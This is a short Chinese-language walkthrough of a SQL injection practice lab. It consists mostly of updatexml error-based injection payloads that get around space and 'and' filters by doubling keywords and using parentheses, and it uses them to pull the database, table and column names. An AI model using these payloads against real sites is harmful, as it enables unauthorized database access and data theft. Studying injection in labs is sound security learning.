0X01
測試閉合 單引號報錯 雙引號不報錯 ’閉合
構造語句 過濾了空格和and
?id=1' anandd 1=1%23
?id=1'+anandd+1=1%23
百度一下
一去看源碼 真的頂不住
那我們就別光想着正確的地方輸入了 我們用報錯注入
?id=1'||updatexml(1,concat(':',(select database())),1)||'1'='1
0X02爆表名
but 好像不行
1'||updatexml(1,concat(':',(select table_name from informatiom_schema.tables where table_schema='security' limit 0,1)),1)||'1'='1
繞過
0'||updatexml(1,concat('$',(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security'))),0)||'1'='1
0X03爆破列名
?id=-1%27||updatexml(1,concat(%27%%27,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name=%27users%27))),1)||%271%27=%271
hint:group_concat(table_name)) 第一個括號是閉合select 之后的空格 第二個括號是閉合group_caoncat語法
加油學習 切記 學習之路 少就是多 慢就是快